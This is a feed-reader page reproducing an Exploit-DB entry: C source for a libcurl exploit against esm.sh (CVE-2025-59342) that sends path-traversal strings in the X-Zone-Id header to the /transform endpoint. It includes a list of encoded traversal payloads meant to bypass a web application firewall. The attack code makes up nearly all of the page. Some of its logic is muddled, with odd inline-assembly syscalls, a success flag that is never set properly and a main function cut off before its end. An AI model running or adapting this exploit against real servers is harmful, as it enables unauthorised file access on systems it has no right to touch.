惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 三生石上(FineUI控件)
Martin Fowler
Martin Fowler
月光博客
月光博客
AI
AI
B
Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
C
CXSECURITY Database RSS Feed - CXSecurity.com
WordPress大学
WordPress大学
GbyAI
GbyAI
L
Lohrmann on Cybersecurity
O
OpenAI News
Schneier on Security
Schneier on Security
P
Palo Alto Networks Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
T
Troy Hunt's Blog
V2EX - 技术
V2EX - 技术
W
WeLiveSecurity
L
LINUX DO - 最新话题
人人都是产品经理
人人都是产品经理
S
Security Affairs
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
A
Arctic Wolf
Recorded Future
Recorded Future
Microsoft Security Blog
Microsoft Security Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
G
GRAHAM CLULEY
N
Netflix TechBlog - Medium
TaoSecurity Blog
TaoSecurity Blog
C
Check Point Blog
Scott Helme
Scott Helme
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Apple Machine Learning Research
Apple Machine Learning Research
PCI Perspectives
PCI Perspectives
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Vercel News
Vercel News
The Hacker News
The Hacker News
Y
Y Combinator Blog
Latest news
Latest news
SecWiki News
SecWiki News
Hugging Face - Blog
Hugging Face - Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Google Online Security Blog
Google Online Security Blog
Webroot Blog
Webroot Blog
Google DeepMind News
Google DeepMind News
Recent Commits to openclaw:main
Recent Commits to openclaw:main
C
Cisco Blogs
博客园_首页
H
Hackread – Cybersecurity News, Data Breaches, AI and More
宝玉的分享
宝玉的分享
L
LINUX DO - 热门话题

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Byte Reaper · 2025-12-16 · via Exploit-DB.com RSS Feed

esm-dev 136 - Path Traversal

# Exploit Title:  esm-dev 136 - Path Traversal
# Date: 2025-07-11
# Exploit Author: Byte Reaper 
#Vendor Homepage: https://github.com/esm-dev/esm.sh
# Software Link: https://github.com/esm-dev/esm.sh
# CVE-2025-59342
 - File   : exploit.c
 - Date   : 09/17/2025
 - Target : esm-dev
 - Version: 136
 - Target Endpoint : /transform
 - Target Header   :  X-Zone-Id
 - Vuln : 
 - Run exploit : 
            # gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
            # ./CVE-2025-59342

#include <curl/curl.h>
#include <string.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#include <unistd.h>
#include <sys/utsname.h>
#define FULL_URL 2500 
#define P_Y      2000
#define POST_DATA 9000
int flagPort = 0;
int port = 80;
int selectPort = -1;
int verbose = 0;
int code = 1;
int found = 1;
int cF = 0;
int s = 0;
int bY = 0;
int sP = 0;
const char* cookies = NULL;
const char* payload = NULL;
void exit64bit()
{
    int n = 0;
    __asm__ volatile
        (
            "mov $0x4A, %%rax\n\t"
            "mov $0x1, %%rdi\n\t"
            "syscall\n\t"
            "test %%rax, %%rax\n\t"
            "jz .aD\n\t"
            "mov $0x0, %[var]\n\t"
            "jmp .finish\n\t"
            ".aD:\n\t"
            "mov $0x1, %[var]\n\t"
            ".finish:\n\t"
            : [var] "+r" (n)
            :
            : "rax",
            "rdi"
            );
    if (n == 0)
    {
        printf("\e[0;31m[-] sys_fsync syscall Faild.\n");
        fflush(stdout);
    }
    else if (n == 1)
    {
        printf("[+] sys_fsync syscall Success.\n");
    }

    __asm__ volatile
        (
            "mov $0x0, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "syscall\n\t"
            :
            :
            : "rax", 
              "rdi"
        );   
}

struct Mem
{
    char* buffer;
    size_t len;
};
size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)
{
    size_t total = size * nmemb;
    struct Mem* m = (struct Mem*)userdata;
    char* tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp) return 0;
    m->buffer = tmp;
    memcpy(&(m->buffer[m->len]), ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

int checkLen(int len, char* buf, size_t bufcap)
{
    if (len < 0 || (size_t)len >= bufcap)
    {
        printf("\e[0;31m[-] Len is Long ! \e[0m\n");
        printf("\e[0;31m[-] Len %d\e[0m\n", len);
        return 1;
    }
    else
    {
        printf("\e[0;34m[+] Len Is Not Long.\e[0m\n");
        return 0;

    }
    return 0;
}

const char* payloads[] = 
{
    "..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//",
    "..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
    "..\\/..\\/modules\\/transform\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\/",
    ".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
    "..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
    "%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f",
    "..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
    "%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f",
    "..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
    "%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c",
    "%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e",
    "%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216",
    "%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af",
    ".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
    "..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/",
    "%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af",
    NULL

};

static void request(const char *baseurl)
{
    CURL* curl = curl_easy_init();
    const char *mes3 = "\e[0;34m[+] Create Object CURL Success.\n";
    const char *mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n";
    size_t len3 = strlen(mes3);
    size_t len4 = strlen(mes4);
    __asm__ volatile
        (
            "cmp $0x0,    %[curlO]\n\t"
            "je .donV\n\t"
            ".erD:\n\t"           
            "mov $0x1,    %%rax\n\t"
            "mov $0x1,    %%rdi\n\t"
            "mov %[msg], %%rsi\n\t"
            "mov %[len], %%rdx\n\t"
            "syscall\n\t"
            "jmp .finishC\n\t"
            ".donV:\n\t"
            "mov $0x1,    %%rax\n\t"
            "mov $0x1,    %%rdi\n\t"
            "mov %[msg1], %%rsi\n\t"
            "mov %[len1], %%rdx\n\t"
            "syscall\n\t"
            "xor %%rdi,   %%rdi\n\t"
            "mov $0x3C,   %%rax\n\t"
            "syscall\n\t"
            ".finishC:\n\t"
            :
            : [curlO] "r" (curl),
              [msg]   "r" ((const char *)mes3),
              [len]   "r" ((long)len3),
              [msg1]  "r" ((const char*)mes4),
              [len1]  "r" ((long)len4)
            : "rax",
              "rdi",
              "rsi",
              "rdx",
              "rcx",
              "r11",
              "memory"
        );
    struct Mem response;
    CURLcode res;
    response.buffer = NULL;
    response.len = 0;
    const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
    size_t len5 = strlen(mes5);
    __asm__ volatile (
        "test %[buffer], %[buffer]\n\t"
        "jz  L_print_clean\n\t"
        "L_continue:\n\t"
        "jmp L_done\n\t"
        "L_print_clean:\n\t"
        "mov $0x1, %%rax\n\t"
        "mov $0x1, %%rdi\n\t"
        "movq %[msg13], %%rsi\n\t"
        "mov %[len13], %%rdx\n\t"  
        "syscall\n\t"
        "L_done:\n\t"
        :
        : [buffer] "r" ((const char*)response.buffer),
        [msg13]    "r" (mes5),
        [len13]  "r" (len5)
        : "rax",
        "rdi",
        "rsi",
        "rdx",
        "rcx",
        "r11",
        "memory"
        );
    char full[FULL_URL];
    
	if (flagPort != 0)
	{
        const char* mes8 = "\e[0;31m[-] Select Port is NULL !\e[0m\n";
        size_t len8 = strlen(mes8);
        __asm__ volatile (
            "test %[var22], %[var22]\n\t"
            "jnz L_finish\n\t"
            "mov $1, %%rax\n\t"
            "mov $1, %%rdi\n\t"
            "mov %[msg13], %%rsi\n\t"
            "mov %[len13], %%rdx\n\t"
            "syscall\n\t"
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "syscall\n\t"
            "L_finish:\n\t"
            :
            : [var22] "r" (selectPort),
              [msg13]  "r" (mes8),
              [len13] "r" (len8)
            : "rax", 
              "rdi", 
              "rsi", 
              "rdx", 
              "rcx", 
              "r11", 
              "memory"
            );
		printf("\e[0;34m[+] Port Select  : %d\e[0m\n", 
            selectPort);
		int len1 = snprintf(full, 
            FULL_URL, 
            "%s:%d/transform", 
            baseurl,selectPort);
        if (checkLen(len1, 
            full, 
            FULL_URL) == 1)
        {
            fprintf(stderr, 
                "\e[0;31m[-] Error write base url !\e[0m\n");
            exit64bit();
        }
        printf("\e[0;34m[+] Write base URL success.\e[0m\n");
	}
	else if (flagPort == 0)
	{
		printf("\e[0;34m[+] Auto port : %d\e[0m\n", port);
        int len2 = snprintf(full, 
            FULL_URL, 
            "%s:%d/transform", 
            baseurl, 
            port);
        if (checkLen(len2, full, FULL_URL) == 1)
        {
            fprintf(stderr, 
                "\e[0;31m[-] Error write base url !\e[0m\n");
            exit64bit();
        }
        printf("\e[0;34m[+] Write base URL success.\e[0m\n");
	}
    printf("[+] Base URL : %s\n", baseurl);
    printf("[+] Result full url : %s\n", full);
    char post[POST_DATA];
    int len9 = snprintf(post, POST_DATA, "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
    if (checkLen(len9, post, POST_DATA) == 1)
    {
        fprintf(stderr, 
            "[-] Error write post data !\e[0m\n");
        exit64bit();
    }
    printf("\e[0;34m[+] Write Post data Success.\e[0m\n");
    printf("\e[0;35m[+] Post data :===================================\e[0m\n");
    printf("%s\n", post);
    printf("\e[0;32m[+] Size : %d\e[0m\n", POST_DATA);
    printf("\e[0;32m[+] Len  : %zu\e[0m\n", strlen(post));
    printf("\e[0;35m==================================================\e[0m\n");
    curl_easy_setopt(curl,
        CURLOPT_URL,
        full);
    curl_easy_setopt(curl,
        CURLOPT_ACCEPT_ENCODING,
        "");
    curl_easy_setopt(curl,
        CURLOPT_FOLLOWLOCATION,
        1L);
    if (cF)
    {

        curl_easy_setopt(curl,
            CURLOPT_COOKIEFILE,
            cookies);
        curl_easy_setopt(curl,
            CURLOPT_COOKIEJAR,
            cookies);

    }
    curl_easy_setopt(curl,
        CURLOPT_POST,
        1L);
    curl_easy_setopt(curl,
        CURLOPT_POSTFIELDS,
        post);
    curl_easy_setopt(curl,
        CURLOPT_POSTFIELDSIZE,
        (long)strlen(post));
    curl_easy_setopt(curl,
        CURLOPT_WRITEFUNCTION,
        write_cb);
    curl_easy_setopt(curl,
        CURLOPT_WRITEDATA,
        &response);
    curl_easy_setopt(curl,
        CURLOPT_CONNECTTIMEOUT,
        5L);
    struct timespec rqtp, rmtp;
    rqtp.tv_sec = 1;
    rqtp.tv_nsec = 500000000;
    register long r10R asm("r10");
    r10R = 0;
    printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
        rqtp.tv_sec, rqtp.tv_nsec);
    int ret;
    __asm__ volatile
        (
            "syscall"
            : "=a"(ret)
            : "a"(0xE6),
              "D"((long)0),
              "S"((long)0),
              "d"(&rqtp),
              "r"(r10R)
            : "rcx",
              "r11",
              "memory"
            );
    curl_easy_setopt(curl,
        CURLOPT_TIMEOUT,
        10L);
    curl_easy_setopt(curl,
        CURLOPT_SSL_VERIFYPEER,
        0L);
    curl_easy_setopt(curl,
        CURLOPT_SSL_VERIFYHOST,
        0L);
    struct curl_slist* headers = NULL;
    headers = curl_slist_append(headers,
        "User-Agent: Den/8.7.1");
    headers = curl_slist_append(headers,
        "Accept: */*");
    headers = curl_slist_append(headers,
        "Connection: keep-alive");
    headers = curl_slist_append(headers,
        "Content-Type: application/json");
    headers = curl_slist_append(headers,
        "Referer: http://localhost:9999/"); 
    if (s!=0)
    {
        printf("[+] Your Payload : %s\n", payload);
        printf("\e[0;33m[+] Checking payload...\n");

        if (strstr(payload, "../") || strstr(payload, "..\\")) 
        {
            printf("\e[0;36m[+] Detected path traversal \"../\" in payload.\n");
        }
        else 
        {
            printf("\e[0;31m[-] No path traversal detected. Please provide a valid payload.\n");
            exit64bit();
        }

        if (strstr(payload, "/transform")) 
        {
            printf("\e[0;36m[+] Detected endpoint '/transform' in payload.\n");
        }
        else 
        {
            printf("\e[0;31m[-] Endpoint '/transform' not detected in payload!\n");
            exit64bit();;
        }
        
    }
    
    else
    {
        headers = curl_slist_append(headers,
            "X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/"); //auto payload 
        printf("[+] Auto payload ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/.\n");
    }   
    curl_easy_setopt(curl, 
        CURLOPT_HTTPHEADER, 
        headers);
    if (verbose)
    {
        curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
    }
    res = curl_easy_perform(curl);
    curl_slist_free_all(headers);
    if (res == CURLE_OK)
    {
        printf("\e[1;36m[+] Request sent successfully\e[0m\n");
        long httpcode;
        double timeT;
        double timeR;
        char* urlD = NULL;
        curl_easy_getinfo(curl, 
            CURLINFO_RESPONSE_CODE,
            &httpcode);
        curl_easy_getinfo(curl, 
            CURLINFO_TOTAL_TIME, 
            &timeT);
        curl_easy_getinfo(curl,
            CURLINFO_REDIRECT_TIME,
            &timeR);
        curl_easy_getinfo(curl,
            CURLINFO_REDIRECT_URL,
            &urlD);
        printf("\e[0;32m[+] Delayed response : %f\e[0m\n", timeT);
        printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n", timeR);
        if (urlD == NULL)
        {
            printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n");
        }
        else
        {
            printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n", urlD);
        }
        
        printf("\e[0;32m[+] HTTP CODE : %ld\n", httpcode);
        if (response.buffer != NULL)
        {
            printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
            printf("%s\n", response.buffer);
            printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer));
            printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len);
            printf("\e[0;35m==========================================================================================================\e[0m\n");
        }
        else
        {
            printf("\e[0;31m[-] Error show buffer : NULL response !\n");
            __asm__ volatile
            (
                    "mov $0x0, %%rdi\n\t"
                    "mov $0xE7, %%rax\n\t"
                    "syscall\n\t"
                    :
                    :
                    :"rax",
                     "rdi"
             );
        }
        printf("===========================================================================================================\n");
        if (httpcode >= 200 && httpcode < 300)
        {
            const char* words[] = 
            {
                "Exploit!",
                "cve.js",
                "mjs",
                "console",
                "code",
                "map",
                "AAAA",
                "IAAI",
                "names",
                NULL
            };
            printf("\e[0;32m[+] Http code (200 - 300)\e[0m\n");
            printf("\e[0;33m[+] Check Word in response...\e[0m\n");
            
            for (int u = 0; words[u] != NULL; u++)
            {
                code = 1;
                if (strstr(response.buffer, words[u]) != NULL)
                {
                    printf("[+] Word found in response : %s\n",
                        words[u]);
                    __asm__ volatile
                        (
                            "mov $0x0, %[var12]\n\t"
                            : [var12] "=r" (found)
                            :
                            :
                            );
                    break;
                }
            }
            if (found == 0)
            {
                printf("\e[0;36m[+] Words were found in the server's response, indicating that the exploitation was likely successful.\e[0m\n");
            }
            const char *mes11 = "\e[0;31m[-] Not found words in response !\e[0m\n";
            size_t len11 = strlen(mes11);
            __asm__ volatile   
             (
                 "test %[var11], %[var11]\n"
                 "jnz notZero\n\t"
                 "jmp finish11\n\t"
                 "notZero:\n\t"
                 "mov $0x1, %%rax\n\t"
                 "mov $0x1, %%rdi\n\t"
                 "movq %[size11], %%rsi\n\t"
                 "mov %[len11], %%rdx\n\t"
                 "syscall\n\t"
                 "finish11:\n\t"
                :
                : [var11] "r" ((int)found),
                  [size11] "r" ((const char *)mes11),
                  [len11] "r" (len11)
                :"rax", 
                 "rdi", 
                 "rsi", 
                 "rdx",
                 "r11", 
                 "rcx", 
                 "memory"
                 
             );
            
           
        }
        else
        {
            printf("\e[0;31m[-] Http code Not range (200 - 300)\e[0m\n");
            printf("\e[0;31m[-] Please check url and port.\e[0m\n");
        }
        printf("\e[0;35m[+] Result Exploit :\e[0m\n");

        if (code == 1 && found == 0)
        {
            printf("\e[0;36m[+] HTTP code positive and expected word found: Exploit succeeded (CVE-2025-59342).\e[0m\n");
        }
        else if (code == 1 && found != 0)
        {
            printf("\e[0;36m[+] HTTP code positive but expected word not found: Partial success (CVE-2025-59342).\e[0m\n");
        }
        else if (code != 1 && found == 0)
        {
            printf("\e[0;31m[-] HTTP code negative but word found: Unexpected result (CVE-2025-59342).\e[0m\n");
        }
        else 
        {
            printf("\e[0;31m[-] Exploitation did not succeed.\e[0m\n");
        }

    }
    else
    {
        printf("\e[0;31m[-] Error Send Request !\e[0m\n");
        printf("\e[0;31m[-] Error : %s\n", curl_easy_strerror(res));
        exit64bit();
    }
    curl_easy_cleanup(curl);
    free(response.buffer);
}

void bypass(const char* urlB)
{
    struct Mem responseBypass;
    responseBypass.buffer = NULL;
    responseBypass.len = 0;

    const char* mes14 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n";
    size_t len14 = strlen(mes14);
    __asm__ volatile (
        "test %[buffer1], %[buffer1]\n\t"
        "jz  L_print_clean1\n\t"
        "L_continue1:\n\t"
        "jmp L_done1\n\t"
        "L_print_clean1:\n\t"
        "mov $0x1, %%rax\n\t"
        "mov $0x1, %%rdi\n\t"
        "movq %[msg14], %%rsi\n\t"
        "mov %[len14], %%rdx\n\t"
        "syscall\n\t"
        "L_done1:\n\t"
        :
        : [buffer1] "r" ((const char*)responseBypass.buffer),
          [msg14]    "r" (mes14),
          [len14]  "r" (len14)
        :   "rax",
            "rdi",
            "rsi",
            "rdx",
            "rcx",
            "r11",
            "memory"
        );
    CURL* curl = curl_easy_init();
    if (curl == NULL)
    {
        fprintf(stderr,"[-] Error Create Object CURL !\n");
        exit64bit();
    }
    CURLcode res1;
    char postData[POST_DATA];
    int len15 = snprintf(postData, 
        POST_DATA, 
        "{\"filename\":\"cve.js\",\"lang\":\"js\",\"code\":\"console.log('Exploit!');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\",\"react-dom\":\"https://esm.sh/react-dom\"}},\"jsxImportSource\":\"react\",\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}");
    if (checkLen(len15, 
        postData, 
        POST_DATA) == 1)
    {
        fprintf(stderr,
            "[-] Error write post data !\e[0m\n");
        exit64bit();
    }
    if (curl)
    {
        for (int i = 0; payloads[i] != NULL; i++)
        {
            struct curl_slist* h = NULL;
            char fullURL[FULL_URL];
            snprintf(fullURL, 
                FULL_URL, 
                "%s/transform", 
                urlB);
            char hLine[1024];
            snprintf(hLine, 
                1024, 
                "X-Zone-Id: %s", 
                payloads[i]);

            h = curl_slist_append(h, hLine);
            h = curl_slist_append(h, 
                "User-Agent: Den/8.7.1");
            h = curl_slist_append(h, 
                "Content-Type: application/json");
            curl_easy_setopt(curl, 
                CURLOPT_URL, 
                fullURL);
            curl_easy_setopt(curl, 
                CURLOPT_HTTPHEADER, 
                h);
            if (cF)
            {

                curl_easy_setopt(curl,
                    CURLOPT_COOKIEFILE,
                    cookies);
                curl_easy_setopt(curl,
                    CURLOPT_COOKIEJAR,
                    cookies);

            }
            curl_easy_setopt(curl,
                CURLOPT_POSTFIELDS, 
                postData);
            curl_easy_setopt(curl, 
                CURLOPT_POSTFIELDSIZE, 
                (long)strlen(postData));
            curl_easy_setopt(curl, 
                CURLOPT_WRITEFUNCTION, 
                write_cb);
            curl_easy_setopt(curl, 
                CURLOPT_WRITEDATA, 
                &responseBypass);
            struct timespec rqtp, rmtp;
            rqtp.tv_sec = 1;
            rqtp.tv_nsec = 500000000;
            register long r10R asm("r10");
            r10R = 0;
            printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n",
                rqtp.tv_sec, rqtp.tv_nsec);
            int ret;
            __asm__ volatile
                (
                    "syscall"
                    : "=a"(ret)
                    : "a"(0xE6),
                    "D"((long)0),
                    "S"((long)0),
                    "d"(&rqtp),
                    "r"(r10R)
                    : "rcx",
                    "r11",
                    "memory"
                    );
            curl_easy_setopt(curl,
                CURLOPT_TIMEOUT,
                10L);
            curl_easy_setopt(curl,
                CURLOPT_SSL_VERIFYPEER,
                0L);
            curl_easy_setopt(curl,
                CURLOPT_SSL_VERIFYHOST,
                0L);
            res1 = curl_easy_perform(curl);
            curl_slist_free_all(h); 
            if (res1 == CURLE_OK)
            {
                long httpC;
                printf("---------------------------------------------------------------------------------------------------\n");
                printf("\e[1;36m[+] Request sent successfully\e[0m\n");
                printf("[+] Payload Test : %s\n", payloads[i]);

                curl_easy_getinfo(curl, 
                    CURLINFO_RESPONSE_CODE,
                    &httpC);
                printf("[+] Http code : %ld\n", 
                    httpC);
                
                if (responseBypass.buffer != NULL)
                {
                    printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
                    printf("%s\n", responseBypass.buffer);
                    printf("\e[0;35m==========================================================================================================\e[0m\n");
                    if (httpC == 501 || strstr(responseBypass.buffer, 
                        "Unsupported method") != NULL)
                    {
                        printf("[-] Please check target URL, The server does not support the POST request.\n");
                    }
                    else
                    {
                        __asm__ volatile("nop");
                    }
                }
                else
                {
                    printf("[-] Response NULL !\n");
                    exit64bit();
                }
                if (httpC >= 200 && httpC < 300)
                {
                    if (code == 0)
                    {
                        printf("[+] Bypass Waf Success.\n");
                    }
                    else
                    {
                        printf("[-] The server's response is still negative !\n");
                    }
                    if (responseBypass.buffer != NULL)
                    {
                        printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n");
                        printf("%s\n", responseBypass.buffer);
                        printf("%zu\n", responseBypass.len);
                        printf("\e[0;35m==========================================================================================================\e[0m\n");
                        free(responseBypass.buffer);
                        responseBypass.buffer = NULL;
                        responseBypass.len = 0;
                    }
                    else
                    {
                        printf("[-] Response NULL (Bypass WAF) !\n");
                        exit64bit();
                    }
                    
                }
                else
                {
                    printf("[-] Http code Not 200-300 !\n");
                    printf("[+] Waf detect OR check input base url / port.\n");
                }
            }
            
        }

    }
    else
    {
        printf("[-] Error Send Request !\n");
    }
    curl_easy_cleanup(curl);   
}
int main(int argc,
    const char** argv)
{
    printf("\e[1;37m+-----------------------+\e[0m\n");
    printf("\e[1;37m| Author : Byte Reaper  |\e[0m\n");
    printf("\e[1;37m| CVE : CVE-2025-59342  |\e[0m\n");
    printf("\e[1;37m| Vuln : Path Traversal |\e[0m\n");
    printf("\e[1;37m+-----------------------+\e[0m\n");
    printf("\e[1;30m------------------------------------------------------------------------\e[0m\n");
    printf("[+] Check Your os...\n");
    struct utsname os;
    __asm__ volatile
        (
            "mov %0, %%rdi\n\t"
            "mov $0x3F, %%rax\n\t"
            "syscall\n\t"
            :
            : "r"(&os)
            : "rax",
              "rdi"
          );
    printf("\e[0;36m[+] System Name: %s\e[0m\n", os.sysname);
    printf("\e[0;36m[+] Machine    : %s\e[0m\n", os.machine);
    if (strstr(os.sysname, "Linux") != NULL)
    {
        printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n");
    }
    else
    {
        printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n", os.sysname);
        printf("[+] Please RUN exploit in linux.\n");
        exit64bit();
    }
    if (strstr(os.machine, "x86_64") != NULL)
    {
        printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n");
    }
    else
    {
        printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n", os.machine);
        exit64bit();
    }
    const char* url = NULL;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u',
                    "url",
                    &url,
                    "Enter Target URL."),
        OPT_INTEGER('p',
                    "port",
                    &selectPort,
                    "Enter Target PORT."),
        OPT_BOOLEAN('v',
                    "verbose",
                    &verbose,
                    "Verbose Mode."),
       OPT_STRING('c',
                  "cookies",
                  &cookies,
                  "Enter File cookies."),
        OPT_STRING('k',
                    "payload",
                    &payload,
                    "Enter Payload."),
         OPT_BOOLEAN('b',
                    "bypass",
                    &sP,
                    "Arg Bypass WAF."),
        OPT_END()
    };
    struct argparse argparse;
    argparse_init(&argparse,
        options,
        NULL,
        0);
    argparse_parse(&argparse,
        argc,
        argv);

    if (!url)
    {
        printf("\e[0;31m[-] Please Enter Target IP OR URl !\e[0m\n");
        printf("\e[0;31m[!] Exemple : ./CVE-2025-59342 -u http://TARGET\e[0m\n");
        __asm__ volatile
         (
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"
            "1:\n\t"
            "syscall\n\t"
            :
            :
            : "rax", 
              "rdi", 
              "rsi"
            );
    }
    if (verbose)
    {
        __asm__ volatile
        (
            "add $0x1, %[var6]\n\t"
            : [var6] "+r" (verbose)
            :
            :
         );
    }
    else
    {
        __asm__ volatile
            (
                "mov $0x0, %[var7]\n\t"
                : [var7] "=r" (verbose)
                :
                :
                );
    }
    flagPort = (selectPort != -1);
    
    if (payload != NULL)
    {
        s = 1;
    }
    else
    {
        s = 0;
    }
    if (sP) 
    {
        bypass(url);
    }
    else
    {
        request(url); 
    }
